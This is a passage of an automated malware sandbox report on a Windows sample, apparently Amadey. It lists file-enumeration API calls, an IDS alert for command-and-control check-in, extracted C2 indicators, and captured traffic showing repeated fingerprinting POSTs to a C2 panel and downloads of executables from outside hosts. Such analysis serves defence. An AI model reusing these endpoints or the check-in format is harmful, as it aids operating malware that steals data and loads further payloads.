                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0044E739 FindFirstFileExA,2_2_0044E739
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,2_2_0040880C
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0040783C FindFirstFileW,FindNextFileW,2_2_0040783C
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00419A43 FindFirstFileW,FindNextFileW,FindNextFileW,2_2_00419A43
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0040BA7E FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_0040BA7E
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0040BC85 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,2_2_0040BC85
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CCBB8B FindFirstFileExW,2_2_00CCBB8B
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0040F19B _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_0040F19B
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00413234 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,3_2_00413234
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0040F465 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_0040F465
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0040F6AB wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,_memset,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_0040F6AB
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0041D9AB __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindNextFileW,3_2_0041D9AB
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00416BAA wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose,3_2_00416BAA
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00412CAC wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00412CAC
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0040AFE9 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,PathMatchSpecA,CoInitialize,PathMatchSpecA,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,3_2_0040AFE9
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0040A6DC __EH_prolog3_GS,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcat,lstrlenA,_MSFOpenExW,_memset,3_2_0040A6DC
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00409810 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_00409810
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00412AC1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_00412AC1
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00412EF7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose,3_2_00412EF7

                                Networking

                                barindex
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49794 -> 95.141.41.12:80
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 1333
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1333 -> 49810
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 1333
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1333 -> 49810
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 1333
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1333 -> 49810
                                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199555780195
                                Source: Malware configuration extractorURLs: https://t.me/solonichat
                                Source: Malware configuration extractorURLs: mardukoff.info/g9ecOb3jd/index.php
                                Source: Malware configuration extractorURLs: 81.19.131.36
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: GET /svchost.dll HTTP/1.1Host: transdi.org
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 36 30 31 31 26 75 6e 69 74 3d 38 35 33 33 32 31 39 33 35 32 31 32 Data Ascii: d1=1000026011&unit=853321935212
                                Source: global trafficHTTP traffic detected: GET /svchost.exe HTTP/1.1Host: pixcode.com.mx
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 33 30 30 33 32 26 75 6e 69 74 3d 38 35 33 33 32 31 39 33 35 32 31 32 Data Ascii: d1=1000030032&unit=853321935212
                                Source: global trafficHTTP traffic detected: GET /host.exe HTTP/1.1Host: transdi.org
                                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 33 31 30 33 30 26 75 6e 69 74 3d 38 35 33 33 32 31 39 33 35 32 31 32 Data Ascii: d1=1000031030&unit=853321935212
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
